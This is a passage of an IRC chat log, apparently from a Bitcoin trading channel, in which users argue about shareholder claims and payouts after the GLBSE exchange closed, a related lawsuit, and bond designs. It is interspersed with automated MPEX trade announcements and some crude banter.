the coins then Nov 24 15:47:49 pm me you email and i'll be sure to have my lawyer contact you on monday Nov 24 15:48:46 with what kind of info gigavps? Nov 24 15:49:12 dont want to recieve the same email again with that .... story Nov 24 15:49:14 I did not auth so everyone could have said that << ah come on. Nov 24 15:49:35 I am man enough to say I did say it but thats not the case Nov 24 15:50:10 weak Nov 24 15:50:28 someone stole your freenode password to threaten gigavps? Nov 24 15:50:32 whats weak? Nov 24 15:50:59 I just want to recieve my outstanding div and final buyback Nov 24 15:51:17 seriously, how can he determine final buyback? ther is no last 15 days glbse Nov 24 15:51:19 PsychoticBoy how do you propose we decide on the final buyback? Nov 24 15:51:56 http://polimedia.us/bitcoin/mpex.php?mpsic=F.GIGA.ETF Nov 24 15:52:08 in the neightbourhoud of the last trade on glbse lets say 0.6 btc per bond and the outstanding div Nov 24 15:52:08 maybe we should use the last mpex trading price Nov 24 15:52:45 PsychoticBoy please submit the information requested Nov 24 15:52:48 thanks Nov 24 15:53:15 [MPEX] [S.MPOE] 44506 @ 0.00050707 = 22.5677 BTC [+] Nov 24 15:53:17 [MPEX] [S.MPOE] 4700 @ 0.00050564 = 2.3765 BTC [-] Nov 24 15:53:18 [MPEX] [S.MPOE] 31144 @ 0.00050126 = 15.6112 BTC [-] Nov 24 15:53:19 nope wont happen gigavps, I can give you my email and btc address and that would be it Nov 24 15:53:28 i like the guy on the forum who complained for a few pages and then at the end said, "does this mean my 2 shares of giga are gone?" Nov 24 15:54:13 thats the same info you got from glbse so that should be enough Nov 24 15:54:14 PsychoticBoy let me a least see if you are in the list Nov 24 15:54:22 what is your email? Nov 24 15:54:27 and please auth Nov 24 15:54:32 got 2 accounts Nov 24 15:54:56 gigavps: I find it strange you hired a lawyer though Nov 24 15:55:23 if you go back 10 pages in the gigamining thread, there were multiple people asking me to get a lawyer Nov 24 15:55:40 Diablo-D3 why does it seem strange? Nov 24 15:55:47 you can get this email first and check this one: flyingdutchmanbitcoinfund@gmail.com Nov 24 15:56:02 well, with DMC, Im going the route of telling my shareholders to go after GLBSE legally Nov 24 15:56:34 I cant do it alone, even if DMC could afford a lawyer, it needs to be multiple independent complaints and suits against him Nov 24 15:58:03 [MPEX] [S.MPOE] 87118 @ 0.00051415 = 44.7917 BTC [+] Nov 24 15:58:03 [MPEX] [S.MPOE] 5782 @ 0.00051498 = 2.9776 BTC [+] Nov 24 15:59:22 [MPEX] [S.MPOE] 52968 @ 0.00051147 = 27.0915 BTC [-] Nov 24 15:59:23 [MPEX] [S.MPOE] 20561 @ 0.00050126 = 10.3064 BTC [-] Nov 24 15:59:24 PsychoticBoy that email is not in either of the lists i have received Nov 24 15:59:32 hmmn Nov 24 15:59:33 whats the other email? Nov 24 16:13:33 if you go back 10 pages in the gigamining thread, there were multiple people asking me to get a lawyer <<< lol Nov 24 16:13:48 I cant do it alone, even if DMC could afford a lawyer, it needs to be multiple independent complaints and suits against him << who told you this tho ? Nov 24 16:14:45 every day is an exciting day last few days ;) Nov 24 16:15:20 s/days/months/ Nov 24 16:16:44 mircea_popescu: erm, DMC _cant_ afford a lawyer. Nov 24 16:16:50 math told me that. Nov 24 16:17:14 well, so explain this math Nov 24 16:17:31 not the math of affording a lawyer Nov 24 16:17:47 i mean the math of multiple independent suits. do you think courts work by ballot ? Nov 24 16:18:03 mircea_popescu: oh no, its just going to ruin him financially Nov 24 16:18:12 he'll have to keep showing up to court and the moment he doesnt he loses Nov 24 16:18:19 um. Nov 24 16:18:28 they'd prolly be consolidated you aware ? Nov 24 16:18:35 possibly Nov 24 16:18:40 and people can fight that as well Nov 24 16:18:58 in the end, it still causes him massive legal trouble and essentially bankrupts him Nov 24 16:19:13 ya, but one's enough. Nov 24 16:19:45 not if the community wants to make a point Nov 24 16:20:38 forget "the community". the community is a bunch of howlers, they all turn out if there's a catered party. Nov 24 16:20:47 they all fling shit if they have to buy on their own a post stamp Nov 24 16:21:02 "ALL current exchange operators, including those who make several thousand dollars a month, are small peanuts, and will come under this pressure." that sounds a little nefarious. Nov 24 16:21:26 mircea_popescu: feh Nov 24 16:21:28 whatever Nov 24 16:21:39 if they dont want to fight for their investment, then I cant help them Nov 24 16:22:00 DMC cant sue nefario, and the only thing DMC do is make sure nefario never gets another chance to fuck people Nov 24 16:22:10 giga probably wont win either Nov 24 16:22:25 so its not like the community has many options here Nov 24 16:23:14 gigavps https://bitcointalk.org/index.php?topic=127488.msg1354381#msg1354381 did you read that ? Nov 24 16:24:34 I mean, I hope giga wins Nov 24 16:24:36 dont get me wrong Nov 24 16:24:40 but I just dont see it happening Nov 24 16:25:39 hey gigavps hows it going? Nov 24 16:27:00 [MPEX] [S.MPOE] 30700 @ 0.00050317 = 15.4473 BTC [+] Nov 24 16:29:27 how public is this? http://webaccess.sftc.org/Scripts/Magic94/mgrqispi94.dll?APPNAME=IJS&PRGNAME=ROA22&ARGUMENTS=-ACGC12522983 Nov 24 16:30:12 im not as in the loop as i once was, but iv not seen it posted anywhere... Nov 24 16:31:03 pretty public Nov 24 16:31:14 was announced the week it was filed Nov 24 16:33:11 i meant this "MOTION TO QUASH SERVICE OF PROCESS FOR LACK OF PERSONAL JURISDICTION" Nov 24 16:33:23 they are trying to get out of it cuz they are not in NZ... Nov 24 16:33:27 mircea_popescu the initials of my business are in my handle Nov 24 16:33:46 they are saying the TOS says tehy have to sue in a NZ court so suing in SF is fail... Nov 24 16:33:59 true. it'll take a statement of some sort or i dunno Nov 24 16:34:17 Chaang-Noi the trial is in sf not nz Nov 24 16:34:21 i dont think it will go far, but phantomcircuit is 100% sure he will get paid his 60k usd legal fees... Nov 24 16:34:35 that is why there is a motion to quash... Nov 24 16:34:43 he's not the first one to die bankrupt cause he was sure he'll get his legal fees back Nov 24 16:35:16 yeah he is fail, but the motion is to toss the case cuz he is saying the bitcoincia customers can only sue in NZ cuz TOS said so... Nov 24 16:35:28 i dont think many people know this, its not on the forum... Nov 24 16:35:30 court won't quash a trial that names him just because it names some foreign corp Nov 24 16:35:32 i cant post cuz banned Nov 24 16:35:39 and besides, bitcoinica is getting taken out because of insolvency Nov 24 16:35:52 so it'll be just amir, patrick and co plus does 1 through 99 plus nefario. Nov 24 16:35:54 i dont think you understand what im saying. Nov 24 16:36:09 maybe not. Nov 24 16:36:16 but the suit is not just against bitcoinica. Nov 24 16:36:35 yea im not talking about the suit, in talking about the newest motion Nov 24 16:36:46 the one a week ago... Nov 24 16:37:07 i get it. Nov 24 16:37:35 looky : someone sues X, Y and Z. X files a motion to quash the suit because Y can not be sued in tha jurisdiction. Nov 24 16:37:44 the court won't likely quash. it may remove Y. Nov 24 16:37:58 yeah, that is what im saying. Nov 24 16:38:01 it will remove Y anyway, cause of insolvency of Y. so the motion is toothless in all respects. Nov 24 16:38:17 its costing him a huge amount of money. Nov 24 16:38:31 ya well not the fiest time he spent huge amounts on useless shit Nov 24 16:38:32 i personally think he is getting fucked over by his lawyers Nov 24 16:38:38 course last time it wasn't his Nov 24 16:38:44 then again... maybe it's not his this time either. Nov 24 16:38:46 the lawyers made him pay first, never a good sign, lol Nov 24 16:38:56 he could be fucking some chick with a law degree and no practice Nov 24 16:39:04 and she's doing it for no cash payment. Nov 24 16:39:32 i talked to him about this. Nov 24 16:40:03 the coin is at gox, and they are not being sued... and also tihan has control of the gox account now, and he is not being sued Nov 24 16:40:21 i dont think this court case is going to really do anything but fuck over everyone involved in it with legal fees Nov 24 16:40:27 over 1500 usd in fees already. Nov 24 16:40:43 court fees? Nov 24 16:41:00 cuz lawyer fees you can add two 0's to that... Nov 24 16:43:19 court yes. Nov 24 16:51:57 [MPEX] [S.MPOE] 1000 @ 0.00050917 = 0.5092 BTC [+] Nov 24 16:51:57 [MPEX] [S.MPOE] 25120 @ 0.00050918 = 12.7906 BTC [+] Nov 24 16:53:02 [MPEX] [S.MPOE] 35850 @ 0.00050759 = 18.1971 BTC [-] Nov 24 16:53:04 [MPEX] [S.MPOE] 11830 @ 0.00050317 = 5.9525 BTC [-] Nov 24 16:59:48 [MPEX] [S.MPOE] 2378 @ 0.00050126 = 1.192 BTC [-] Nov 24 16:59:49 [MPEX] [S.MPOE] 27322 @ 0.00050106 = 13.69 BTC [-] Nov 24 17:05:12 "Hi bixcoin, I have good news for you. The email address in your bitcointalk.org profile is not in the list sent from GLBSE so you have nothing to worry about!" Nov 24 17:05:30 so neither PsychoticBoy nor bixcoin is on the list... gigavps you sure that list is actually right ? Nov 24 17:05:34 or whatever, the lists. Nov 24 17:07:37 my other account is on the list, but yes the list is incomplete Nov 24 17:08:19 [MPEX] [S.MPOE] 20 @ 0.00050226 = 0.01 BTC [+] Nov 24 17:08:21 [MPEX] [S.MPOE] 19130 @ 0.00050918 = 9.7406 BTC [+] Nov 24 17:10:02 mircea_popescu the list is incomplete Nov 24 17:10:16 it's one of the main reasons for having a claims process in the first place Nov 24 17:10:19 ah Nov 24 17:10:29 i didn't realise "incomplete" means... two thirds or less. Nov 24 17:10:36 gigaminers shouldn't have to conceed to nefario's incompetence Nov 24 17:10:39 i imagined something like 99%. in retrospect, i have no ideea why Nov 24 17:11:01 concede Nov 24 17:11:50 the other reason for the claims process is so no one can collude with nefario to defraud gigaminers and get away with it Nov 24 17:12:19 yeah. one major issue to the entire scheme, that. Nov 24 17:12:25 to put 100% faith into the list is like relisting with glbse Nov 24 17:12:25 especially with all we know about nefario. Nov 24 17:12:38 after they have closed Nov 24 17:13:01 I swear to god Im going to buy another machine just so I can put 16gb of memory in it Nov 24 17:13:03 or 32 Nov 24 17:13:26 [WTT] Breastmilk for Bitcoins - .13 BTC per ounce Nov 24 17:13:34 this is like... a good price i think Nov 24 17:13:51 mircea_popescu: might be cheaper to just get a woman pregnant Nov 24 17:13:55 someone should make a bitcoin breastmilk dairy farm. Nov 24 17:14:03 get milk shipped in from all over the interwebs Nov 24 17:14:08 wait wait wait, I think japan has a thing for this Nov 24 17:14:09 make grana padano Nov 24 17:14:12 sell to japan Nov 24 17:14:14 ;;calc .13*[ticker --last] Nov 24 17:14:14 1.6055013 Nov 24 17:14:22 is a good price Nov 24 17:14:26 yeah. Nov 24 17:14:43 https://www.youtube.com/watch?v=IAxzpTX8aHw Nov 24 17:14:46 dunno about wholesale though Nov 24 17:14:46 you know when i'll be old and unable to get it up anymore Nov 24 17:14:58 ill prolly sell mpex and dedicate myself to woman milkfarming on the webs. Nov 24 17:15:05 distribution and retail aren't the same Nov 24 17:15:31 >too old to get it up anymore Nov 24 17:15:45 they have pills for that Nov 24 17:16:12 4 pinkie pies Nov 24 17:16:25 eh, why should i spend my money on pills. Nov 24 17:16:42 [MPEX] [S.DICE] 54 @ 0.00325448 = 0.1757 BTC [-] Nov 24 17:16:44 [MPEX] [S.DICE] 1600 @ 0.00325447 = 5.2072 BTC [-] Nov 24 17:16:45 [MPEX] [S.DICE] 850 @ 0.0032513 = 2.7636 BTC [-] Nov 24 17:16:46 [MPEX] [S.DICE] 3946 @ 0.00321556 = 12.6886 BTC [-] Nov 24 17:17:20 jcpham: WHAT THE FUCK DOES THAT EVEN MEAN Nov 24 17:17:43 mircea_popescu: because fucking chicks is a god given right Nov 24 17:18:06 well so then let god pay for pils. Nov 24 17:18:14 o goood... won't you buy meee.... some viagra pills. Nov 24 17:18:31 my friends all fuck chickens and then eat their bills... Nov 24 17:18:37 o gooo-oood... won't you buy meee Nov 24 17:18:44 NO. INSTEAD I SHALL BLESS YOU WITH A FOUR HOUR ERECTION. MAKE GOOD USE OF IT. Nov 24 17:18:59 o hey Diablo-D3... i'm coming over. Nov 24 17:19:02 gotta show you something. Nov 24 17:19:22 Ive seen a dick before. Nov 24 17:19:33 Yup, still where I left it. Nov 24 17:19:49 we need new cheese names, for woman cheese. Nov 24 17:19:52 like... tittish blue. Nov 24 17:23:43 [MPEX] [S.MPOE] 10350 @ 0.00050918 = 5.27 BTC [+] Nov 24 17:27:13 huh Nov 24 17:27:14 woman cheese Nov 24 17:34:46 [MPEX] [S.MPOE] 1000 @ 0.00051497 = 0.515 BTC [+] Nov 24 17:34:48 [MPEX] [S.MPOE] 11450 @ 0.00051498 = 5.8965 BTC [+] Nov 24 17:45:03 [MPEX] [S.MPOE] 23053 @ 0.00051498 = 11.8718 BTC [+] Nov 24 17:46:00 looks like you two are having your early morning wankerfest Nov 24 17:48:46 you can keep your cookie, you two keep licking it :) Nov 24 17:49:32 so, gigavps managed to show his real face and fucked everyone over... Nov 24 17:49:47 [MPEX] [S.MPOE] 10300 @ 0.00051424 = 5.2967 BTC [-] Nov 24 17:50:42 doesn't seem he had much in the way of choice. Nov 24 17:51:28 why do you say that? He had no problem taking the coin in the first place Nov 24 17:51:44 well yea. Nov 24 17:51:58 he's the only one trying to pay people Nov 24 17:52:01 if he had the sense to never move to glbse Nov 24 17:52:07 for some reason I think that he made it up and asked some slimeball to write that letter Nov 24 17:52:08 and kept it as it originally was, private offering Nov 24 17:52:15 i guess it'd be no problem right about now. Nov 24 17:52:33 those are all "if" and "then..." blaa blaa. Nov 24 17:52:37 listen, EskimoBob : back in april he was under a lot of pressure (from me) to not even go ahead with the glbse listing. Nov 24 17:52:47 in retrospect it was a bad move. what can i tell you. Nov 24 17:53:04 he wanted to give everyone a chance or w/e Nov 24 17:53:10 [MPEX] [S.MPOE] 18700 @ 0.00051424 = 9.6163 BTC [-] Nov 24 17:53:14 this is all hindsight :) Nov 24 17:53:20 20/20 ;) Nov 24 17:53:29 well for everyone else it is. it was foresight for me bacvk then, but anyway. Nov 24 17:53:49 so, yea he relied on glbse. guess what ? his investors did too. Nov 24 17:54:01 everyone did, cause it was fashionable to do at the time. Nov 24 17:54:54 so what, this will note excuse what he is doing now Nov 24 17:55:17 question is, who will be the next greedy fuck, who pulls something similar Nov 24 17:55:22 well, what he's doing now is trying to somehow fix it. he has scant alternatives and so he's stuck with lawyers. Nov 24 17:55:55 how is he fixing this shit now with that bs he posted? Nov 24 17:56:09 it seems he got a dubious list from nefario. Nov 24 17:56:14 he changed the rules, demands info he has no need for etc Nov 24 17:56:25 from what he's said (above) he has some grounds to suspect it may even have been tampered it, or might have been. Nov 24 17:56:29 or could have been. who knows. Nov 24 17:56:42 what if you had however many shares but simply WERE NOT on nefario's list ? Nov 24 17:56:47 i do not think so. He probably gor incomplete list because some did not send the double payment back Nov 24 17:56:53 can he go "sorry, you're not on the list" iyo ? Nov 24 17:57:06 like usagi did to me? Nov 24 17:57:09 yes. Nov 24 17:57:29 James told issuers that this list is NOT! complete Nov 24 17:57:38 so what are they to do ? Nov 24 17:57:57 pay back the double payment Nov 24 17:58:01 to James Nov 24 17:58:02 you are the issuer. you receive a "list" which someone meanwhile tagged as a scammer says is not complete. what do you do ? Nov 24 17:58:13 it's two months late, to boot. Nov 24 17:58:26 why is it two months late ? did he take this long to doctor the lists, put his own accounts in there ? Nov 24 17:58:31 you don't know. Nov 24 17:58:37 so what can you do ? Nov 24 17:58:38 irrelevant Nov 24 17:59:02 list is incomplete because some received a double payment when James fucked up Nov 24 17:59:11 how do you know that's the only reason ? Nov 24 17:59:21 how do you know what's on the list is the actual legitimate owners ? Nov 24 17:59:42 now few slimebags use that to force some to give up Nov 24 18:00:05 look, i understand the cui prodest approach. it's fine, nothing wrong with it. Nov 24 18:00:15 but it's not the end all-be all. Nov 24 18:00:24 how did I know that trades really happened in GLBSE, how do I know that sky is blue... blaa blaa blaa Nov 24 18:00:45 sure, james fucked up twice Nov 24 18:01:18 all he needed to forward to issuer was a hash and a payment account number Nov 24 18:01:27 the next day. Nov 24 18:01:38 if by oct 6th everyone had that in their mailbox i could totally see your pov. Nov 24 18:01:44 and send the shareholder the "secret code", balance and the hash Nov 24 18:01:56 ideally send all this encrypted. Nov 24 18:02:10 it was relly stupid to send the e-mail too Nov 24 18:02:12 bad idea Nov 24 18:02:38 encrypting somethinmg will not make it more correct or true Nov 24 18:02:48 no but it will maintain its secrecy. Nov 24 18:03:12 to own property you must either be identified and public or else anon AND SECRET Nov 24 18:03:20 I men we can do it with a md5 has and be done with . You never have to know my e-mail address Nov 24 18:03:26 anonimity itself is destructive of property rights. only if coupled with secrecy does it work. Nov 24 18:03:30 do you understand this point ? Nov 24 18:03:34 but I can prove it's me who owns the shares Nov 24 18:03:38 how ? Nov 24 18:03:39 hi EskimoBob Nov 24 18:03:50 gigavps: hello darling Nov 24 18:03:53 EskimoBob do you own gigamining? Nov 24 18:04:29 [MPEX] [S.DICE] 354 @ 0.00321556 = 1.1383 BTC [-] Nov 24 18:04:30 [MPEX] [S.DICE] 7575 @ 0.00321486 = 24.3526 BTC [-] Nov 24 18:04:32 I did and I sold after I realized you can not be trusted. I think we have talked about it Nov 24 18:04:46 EskimoBob how can i trust nefario to give me a proper list? Nov 24 18:05:08 EskimoBob what should i do when people make claims that are not of nefario's list? Nov 24 18:05:13 before i obviously realized that perpetual bonds are losers :) Nov 24 18:05:37 gigavps: good question Nov 24 18:05:44 EskimoBob do you think gigaminers should not get their past payments because nefario fucked up? Nov 24 18:05:44 it sure is hard but what else can you do? Nov 24 18:05:55 gigavps you absolutely need to make a full length statement and discuss all this in excruciating detail. Nov 24 18:06:01 gigavps: there are 3 sides on this Nov 24 18:06:05 prolly should have done it in parallel with the announcement. Nov 24 18:06:07 mircea_popescu it's coming Nov 24 18:06:08 1) you Nov 24 18:06:08 EskimoBob: were you here when I was talking about what I wanted to do with dmc 2.0? Nov 24 18:06:14 2) nefario Nov 24 18:06:19 3) investor Nov 24 18:06:36 some of the 3 have beef with 2 and they need to fix that Nov 24 18:06:37 EskimoBob nefario can't even send me a properly formatted yaml file Nov 24 18:06:48 which means he put it together by HAND Nov 24 18:06:52 gigavps did he sign the lists he sent btw ? Nov 24 18:07:03 before you can do anything with their clime Nov 24 18:07:06 mircea_popescu don't be daft Nov 24 18:07:12 for crying out loud Nov 24 18:07:22 man, you can FEEL the love Nov 24 18:07:27 EskimoBob the ONLY think i am trying to do is to pay ppl Nov 24 18:07:31 [MPEX] [S.MPOE] 15350 @ 0.00051424 = 7.8936 BTC [-] Nov 24 18:07:32 mircea_popescu: why you being daft? :P Nov 24 18:07:48 Diablo-D3: I feel trollish today :/ Prolly didnt get enough sleep Nov 24 18:07:48 ukto apparently for thinking nefario can run gpg --clearsing by hand ? Nov 24 18:08:00 Ukto: I feel trollish every day, so /me shrugs Nov 24 18:08:21 mircea_popescu: I have already made statements on my personal expereince with Nefario's competency. Nov 24 18:08:25 gigavps: apparently not because the lawyer stuff you pulled is NOT helping you to prove shit Nov 24 18:08:43 EskimoBob maybe you should put on your thinking cap for a minute Nov 24 18:08:44 there has to be better way to do it without you getting fucked and your investors too Nov 24 18:08:52 well wtf, so herp derp here's a plaintext-over-email statement of beneficial ownership Nov 24 18:08:57 gigavps: I have not had a chance to look into things yet for shares, but what about ppl who havent done their taxes in a while? Nov 24 18:09:12 EskimoBob if i pay someone according to the list, and the list is not correct, i'm still on the hook to pay them Nov 24 18:09:28 Diablo-D3: what=? Nov 24 18:09:33 mircea_popescu: like evrey other action preformed in the past, no thought went into it. Nov 24 18:09:53 myeah. Nov 24 18:09:56 gigavps: hows that? Nov 24 18:09:58 at least, no clear concise thought Nov 24 18:10:11 EskimoBob: zero coupon non-callable corporate bonds. Nov 24 18:10:17 EskimoBob because i am now making payments, not glbse Nov 24 18:10:23 OK, let me ask this. Why did james remove some names from the list Nov 24 18:10:29 mircea_popescu: you heard what btc-mining is gonna do? close down/pay off? their own trading engine? Nov 24 18:11:06 EskimoBob two reasons Nov 24 18:11:15 1. they never filled out the claims form Nov 24 18:11:17 Ukto i have no ideea. is that namjies ? Nov 24 18:11:26 is it? 0,o Nov 24 18:11:26 2. they were overpaid in the btc return Nov 24 18:11:32 correct Nov 24 18:11:37 3. ? Nov 24 18:11:42 now, why do you have to pay those people? Nov 24 18:11:59 they have not completed 2 or 1 task thy had to Nov 24 18:12:01 1. Create Asset. 2. ??????? 3. Make Money... *joking..* Nov 24 18:12:02 Ukto i think it is. iirc he was taking claims to confirm his lists. Nov 24 18:12:14 EskimoBob, if they own gigamining, they should be able to make a claim Nov 24 18:12:15 no scumbag lawyer will help to clear this up Nov 24 18:12:23 no notarized letter etc Nov 24 18:12:33 it's total waste of time and other peoples money Nov 24 18:12:34 EskimoBob so you hate not just greeks and pornographers but also lawyers ? Nov 24 18:12:38 who do you date exactly ? Nov 24 18:12:46 EskimoBob: while I agree with you, its at least the proper 'legal' course of action. well, mainly if gigavps plans to sue glbse/nefario Nov 24 18:12:53 models, mircea_popescu Nov 24 18:12:53 [MPEX] [S.MPOE] 600 @ 0.00051424 = 0.3085 BTC [-] Nov 24 18:12:54 [MPEX] [S.MPOE] 27654 @ 0.00051333 = 14.1956 BTC [-] Nov 24 18:12:58 otherwise really imho I dont think a lawyer is necessary Nov 24 18:13:05 hate to break it to you, but models smoke the cock on cam. Nov 24 18:13:12 A lawyer having info from someone is no diff than an issuer Nov 24 18:13:15 EskimoBob if there are enough claims that don't match with glbse, we can start making demands for the database Nov 24 18:13:35 gigavps has to take a step back and put his thinking hat on - all he did, was stir up another shitstorm Nov 24 18:13:40 gigavps: you prepared for a long 1~3 year international legal battle? Nov 24 18:13:57 aginst nefario/glbse Nov 24 18:14:00 to demand the database? Nov 24 18:14:03 Ukto my first demand letter is what sparked nefario to get off of his ass Nov 24 18:14:06 gigavps: for start, work with all the names on the list - Nov 24 18:14:08 not anyones elses Nov 24 18:14:21 then Nov 24 18:14:22 gigavps: ah, nice. dont get me wrong, just questioning. :) Nov 24 18:14:37 then send the missing claims to james and find out, what happened Nov 24 18:14:43 and tha's it Nov 24 18:14:43 I have my own extensive experience with lawyers and crap. just curious. :) Nov 24 18:14:47 KISS ;) Nov 24 18:14:52 EskimoBob: well? Nov 24 18:14:54 EskimoBob that is exactly what i am doing Nov 24 18:15:09 gigavps: but whay apostill and al tht crap? Nov 24 18:15:23 how is this helping anyone? Nov 24 18:15:25 EskimoBob: from nefario's point of view, gigavps's actions with the lawyer may actually help glbse holders further as he mentioned. nefario is afraid of lawyers/lawsuites, etc. Nov 24 18:15:38 NO IT WILL NOT! Nov 24 18:15:40 EskimoBob: if nefario feels like things are getting out of hand and he has to do something, he will jump Nov 24 18:16:01 he jumped before he started to think Nov 24 18:16:21 damnit EskimoBob Nov 24 18:16:27 I just want your fucking opinion Nov 24 18:17:04 gigavps: sorry, you are not doing that. You are demanding information that is not helping your form people who are on the list Nov 24 18:17:26 hold on, kids need something Nov 24 18:17:59 EskimoBob: yes, we do need alot of things Nov 24 18:18:00 :P Nov 24 18:18:16 [MPEX] [S.MPOE] 9780 @ 0.00051333 = 5.0204 BTC [-] Nov 24 18:18:16 Diablo-D3: did you send me PM? I must be missing somethimng Nov 24 18:18:38 [11:10:11] EskimoBob: zero coupon non-callable corporate bonds. Nov 24 18:18:59 oh that one, sorry, I missed it :) Nov 24 18:19:23 the bonds will be "physical" certs that are digitally signed with a single use pgp key Nov 24 18:19:24 you know I do not like that non-callable stuff at all Nov 24 18:19:39 EskimoBob: its not perpetual, though Nov 24 18:19:39 zeros are super stuff but NC par is bad Nov 24 18:19:49 Diablo-D3: there is better way Nov 24 18:19:52 it'll be like for 5 years or something Nov 24 18:20:05 and then sell them with a bid-driven OID Nov 24 18:20:06 set the date, but add that bond can be refinanced Nov 24 18:20:18 EskimoBob: I just wanted to say Hi. :P Nov 24 18:20:28 Ukto: Hi Nov 24 18:20:30 EskimoBob: refinancing them doesn't make sense imo Nov 24 18:20:33 lol Nov 24 18:20:40 alright, enough trolling for now. Nov 24 18:20:42 Diablo-D3: sure it does Nov 24 18:20:46 EskimoBob: issuing multiple issues of bonds does Nov 24 18:20:58 er, multiple series Nov 24 18:21:00 not really but depends Nov 24 18:21:11 I want as little bullshit as possible Nov 24 18:21:19 you see, multiple issues after each other is bad Nov 24 18:21:42 no dividends means no need for day to day exchange manhandling Nov 24 18:22:00 no complex legal work means less work for both sides Nov 24 18:22:02 one issue, callable at X on date Y and if needed, refinanced before Y is good Nov 24 18:22:29 or lets say better Nov 24 18:22:39 callable makes it more complex Nov 24 18:22:59 rolling out bond issues one after another is real crapp and build ZERO trust Nov 24 18:23:00 EskimoBob if i pay someone i shouldn't have, i need legal recourse, especially if this comes to light when btc is $1000/coin Nov 24 18:23:21 sure, lets not go there Nov 24 18:23:24 :) Nov 24 18:23:38 so notorizing signed documents is kind of important Nov 24 18:24:02 EskimoBob: why would you want it to be callable though? Nov 24 18:24:03 Oh, btw, i made another cool and dark, bit rusty looking BTC mug Nov 24 18:24:14 plently of ppl have already submitted this info and will be paid next week Nov 24 18:24:32 EskimoBob there are about 10 ppl in the forums screaming Nov 24 18:25:01 Diablo-D3: because I want you asa issuer to show that you will call (buy) your bonds back at date X - means you will manage the funds so you will have the available coin to do so Nov 24 18:25:23 overly simplify Nov 24 18:25:25 d Nov 24 18:25:28 EskimoBob: yes, but a non-callable bond means I _must_ buy it back at that date. Nov 24 18:25:38 the only difference is I cant do it early at my choice Nov 24 18:25:54 [MPEX] [S.MPOE] 5066 @ 0.00051333 = 2.6005 BTC [-] Nov 24 18:25:56 [MPEX] [S.MPOE] 11600 @ 0.00051186 = 5.9376 BTC [-] Nov 24 18:25:57 [MPEX] [S.MPOE] 6950 @ 0.00051096 = 3.5512 BTC [-] Nov 24 18:25:58 [MPEX] [S.MPOE] 18650 @ 0.0005082 = 9.4779 BTC [-] Nov 24 18:25:59 [MPEX] [S.MPOE] 6628 @ 0.00050106 = 3.321 BTC [-] Nov 24 18:26:00 [MPEX] [S.MPOE] 5092 @ 0.00050025 = 2.5473 BTC [-] Nov 24 18:26:31 EskimoBob: ie, a 5 year bond, at any point after those 5 years someone can show up with a bond and I have to pay out on it Nov 24 18:26:36 sorry, my bad, when i sayd callable I meant you buy them back on date X (date of maturity) - opposite to perpetual Nov 24 18:26:49 callable is a bond with a prepayment option Nov 24 18:26:50 EskimoBob: non-callable doesnt mean perpetual Nov 24 18:27:06 copumpkin: I know I just messed up Nov 24 18:27:09 non-callable just means I cant pay the bond out early at a reduced payment Nov 24 18:27:22 we talked about perpetualetc Nov 24 18:27:23 fucking options everywhere Nov 24 18:27:28 how do they work Nov 24 18:27:32 I dont want a perpetual bond, they dont fucking work Nov 24 18:28:21 become a UK , have a queen and I'll trust your perpetual bonds. everyone else can fuck off :) Nov 24 18:28:46 zero coupon non-callable corporate bonds Nov 24 18:28:53 I wouldn't say trust is as much of an issue. The thing about a perpetuity is that the later payments are effectively meaningless Nov 24 18:29:08 copumpkin: basically Nov 24 18:29:20 im reading the giga thread and loling and the guys saying they will file criminal charges aginst giga... do these guys not understand that they have no proof of ownership and only nefario has it? Nov 24 18:29:43 Chaang-Noi: not only that, do they understand giga was fucked here? Nov 24 18:29:56 a victim cant legitimately sue another victim Nov 24 18:29:57 im shocked giga is doing as much as he is... Nov 24 18:30:53 giga is not a victim in my mind, only the people who trusted nefario, if i was giga i would say, im not a broker, glbse was, go deal with them... Nov 24 18:31:09 i wonder if giga might be getting himself into more trouble by trying to help Nov 24 18:31:28 giga seems to be going out of his way to help Nov 24 18:31:41 and they just attack him... Nov 24 18:31:58 i do understand about the apostile thing... i cant do that in thailand, we dont have them :/ Nov 24 18:32:40 [MPEX] [S.MPOE] 39122 @ 0.00050025 = 19.5708 BTC [-] Nov 24 18:33:03 someone call for me Nov 24 18:33:33 no, im just shocked at how stupid some of the people are who are bitching in your thread... Nov 24 18:33:55 i wonder the IQ level of the average bitcoiner at times... Nov 24 18:33:56 EskimoBob: what Im thinking is sell like every 10k of bonds for ~7835 Nov 24 18:34:03 Chaang-Noi dunno Nov 24 18:34:19 i've already talked with one of them and they aren't even on the list Nov 24 18:34:54 maybe scammer, maybe the did not give back a double payment, maybe nefario is fucking around or gave you some other list... who knows. Nov 24 18:35:04 im shocked you are even trying to fix this mess. Nov 24 18:35:11 nefario is so fail... Nov 24 18:35:11 Chaang-Noi, gigavps: you can chime in here as well btw Nov 24 18:35:27 whats up D3? Nov 24 18:36:02 what do i need to chime in on? Nov 24 18:36:22 i'm trying to pay people, not sure what else there is to say Nov 24 18:36:25 well, Im trying to plan out DMC 2.0 here Nov 24 18:36:37 good luck Nov 24 18:36:41 I want something that actually works for investing and isnt a fucking failtrain like every exchange ever Nov 24 18:37:06 wait for open transactions Nov 24 18:37:44 the only thing that I can figure out that works is like 5 or 10 year OID non-callable bond Nov 24 18:39:46 and then pgp sign them using a single use key and then bury the key Nov 24 18:40:07 Diablo-D3: I think that's a good idea, unless you actually need 10K Nov 24 18:40:36 EskimoBob: oh? Nov 24 18:40:39 Chaang-Noi: OT will not fix this problem actually :( Nov 24 18:40:52 it actually makes it even worst Nov 24 18:41:18 because I'd need like 1 million BTC. Nov 24 18:41:20 I love the idea but I do not see (at the moment) how it can help Nov 24 18:42:27 OT needs a frontend (not just users GUI) Nov 24 18:43:22 all the "servers" that host securities can connect to that "frontend" Nov 24 18:43:38 well Nov 24 18:43:46 what we'd need is an exchangecoin Nov 24 18:43:54 that logs shit into a bitcoin chain Nov 24 18:44:11 but it only prevents the exchange from running away with your shit Nov 24 18:44:25 it doesnt prevent scams Nov 24 18:44:59 but before the frontend, it needs direct connection to btc/ltc/ppc blockchain so you can pay for your trades and not buysome intermediate crap Nov 24 18:45:03 [MPEX] [S.MPOE] 13169 @ 0.00051246 = 6.7486 BTC [+] Nov 24 18:45:04 [MPEX] [S.MPOE] 24966 @ 0.00051429 = 12.8398 BTC [+] Nov 24 18:45:34 yeah, which actually COULD be done Nov 24 18:45:56 preventing scams is close to impossible unless you want to run SEC type of outfit and basically go back to shit BTC is trying to rid us all Nov 24 18:46:09 store the wallet.dat private keys in the exchangecoin chain Nov 24 18:46:17 to prevent scams, you need to elleminate humans Nov 24 18:46:25 and encrypt them using the exchangecoin address private key Nov 24 